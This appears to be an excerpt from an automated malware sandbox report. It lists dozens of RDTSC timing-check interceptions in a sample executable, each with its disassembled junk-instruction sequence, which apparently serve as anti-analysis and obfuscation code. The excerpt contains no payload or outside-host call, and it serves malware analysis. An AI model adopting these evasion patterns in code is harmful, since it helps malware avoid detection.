                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F4490 second address: 8F44DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FA1C451429Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FA1C451429Dh 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FA1C45142A5h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FA1C45142A7h 0x00000022 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F44DC second address: 8F450E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1C54A6EA6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F9470 second address: 8F9496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA1C45142A9h 0x0000000c js 00007FA1C4514296h 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F9496 second address: 8F949A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F949A second address: 8F94A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F94A0 second address: 8F94B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA1C54A6EA1h 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F818E second address: 8F81D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1C4514296h 0x00000008 jnp 00007FA1C4514296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FA1C45142A8h 0x00000016 pop eax 0x00000017 jmp 00007FA1C45142A0h 0x0000001c popad 0x0000001d push edx 0x0000001e jne 00007FA1C451429Eh 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F88AD second address: 8F88B9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1C54A6E96h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F88B9 second address: 8F88BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F8FCC second address: 8F8FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F8FD0 second address: 8F8FD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F8FD6 second address: 8F8FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F8FE2 second address: 8F8FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F8FE6 second address: 8F8FFE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1C54A6E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b ja 00007FA1C54A6EA6h 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F915D second address: 8F9165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8F9165 second address: 8F9177 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA1C54A6E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FA1C54A6EAEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FDA39 second address: 8FDA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA1C4514296h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FDA43 second address: 8FDA4F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA1C54A6E96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FDBC1 second address: 8FDBC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FDBC7 second address: 8FDBED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007FA1C54A6E96h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA1C54A6E9Ah 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FDBED second address: 8FDBF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FDBF1 second address: 8FDBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FDD42 second address: 8FDD4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FA1C4514296h 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8DDC29 second address: 8DDC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FE3BB second address: 8FE3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FE3C1 second address: 8FE3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FE3C5 second address: 8FE3D9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA1C4514296h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FA1C451429Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FE3D9 second address: 8FE3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FA1C54A6E9Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8DFBD1 second address: 8DFBE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C451429Ch 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FE514 second address: 8FE518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FE823 second address: 8FE828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8AE5EC second address: 8AE5FC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1C54A6E96h 0x00000008 jnl 00007FA1C54A6E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FEC11 second address: 8FEC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8FEC17 second address: 8FEC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 90392A second address: 903932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 903932 second address: 90395C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA1C54A6E96h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1C54A6EA7h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 90395C second address: 903976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 902836 second address: 90285E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FA1C54A6E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FA1C54A6EA9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CE715 second address: 8CE728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C451429Fh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CE728 second address: 8CE766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jne 00007FA1C54A6EABh 0x00000012 pop eax 0x00000013 mov di, B2E8h 0x00000017 jne 00007FA1C54A6E98h 0x0000001d push 47980954h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CE766 second address: 8CE774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FA1C4514296h 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CE8AA second address: 8CE8B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CE8B6 second address: 8CE8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C45142A0h 0x00000009 popad 0x0000000a jmp 00007FA1C45142A8h 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 mov dh, bl 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CE8EE second address: 8CE8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CE8F2 second address: 8CE8F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CEC0D second address: 8CEC14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CEC14 second address: 8CEC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FA1C4514298h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CEC26 second address: 8CEC7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA1C54A6E9Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c sub dword ptr [ebp+122D2972h], esi 0x00000012 push 00000004h 0x00000014 xor edi, 6D78F740h 0x0000001a nop 0x0000001b jmp 00007FA1C54A6EA8h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FA1C54A6EA8h 0x0000002a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CEC7F second address: 8CEC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CEC83 second address: 8CEC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CEF89 second address: 8CEF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA1C4514296h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CF2DD second address: 8CF2EA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1C54A6E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CF2EA second address: 8CF2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CF2FB second address: 8CF300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CF300 second address: 8CF336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jns 00007FA1C451429Ah 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007FA1C4514296h 0x0000001e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CF3BA second address: 8CF3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CF3BE second address: 8CF416 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FA1C4514298h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2D5Ah] 0x0000002a lea eax, dword ptr [ebp+12482E6Bh] 0x00000030 mov edi, 768DD127h 0x00000035 push eax 0x00000036 jo 00007FA1C45142AFh 0x0000003c pushad 0x0000003d jmp 00007FA1C45142A1h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CF416 second address: 8CF447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007FA1C54A6E9Ah 0x0000000d mov edi, ecx 0x0000000f lea eax, dword ptr [ebp+12482E27h] 0x00000015 nop 0x00000016 ja 00007FA1C54A6EA0h 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CF447 second address: 8AE5EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FA1C45142A9h 0x0000000f pop ebx 0x00000010 popad 0x00000011 nop 0x00000012 sub edx, dword ptr [ebp+122D3A4Dh] 0x00000018 call dword ptr [ebp+122D2FD8h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 902F03 second address: 902F39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA8h 0x00000007 jbe 00007FA1C54A6E9Eh 0x0000000d jo 00007FA1C54A6E96h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007FA1C54A6E96h 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 902F39 second address: 902F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 902F3D second address: 902F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 902F43 second address: 902F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 902F4F second address: 902F65 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1C54A6E9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FA1C54A6E96h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9030B8 second address: 9030C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1C451429Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9033D2 second address: 9033DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FA1C54A6E96h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 90353B second address: 90354B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007FA1C4514296h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 90354B second address: 903561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C54A6EA0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 87F581 second address: 87F585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 90A560 second address: 90A567 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 90A567 second address: 90A574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007FA1C45142A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 90A574 second address: 90A57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 90AADC second address: 90AB10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b jmp 00007FA1C45142A5h 0x00000010 pop edi 0x00000011 push esi 0x00000012 je 00007FA1C4514296h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 90EFB8 second address: 90EFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 878C1D second address: 878C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnc 00007FA1C4514296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 878C2E second address: 878C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 878C33 second address: 878C44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1C451429Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 878C44 second address: 878C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91751B second address: 917521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91AE2A second address: 91AE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FA1C54A6E96h 0x0000000c jno 00007FA1C54A6E96h 0x00000012 jmp 00007FA1C54A6EA1h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91AE4F second address: 91AE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
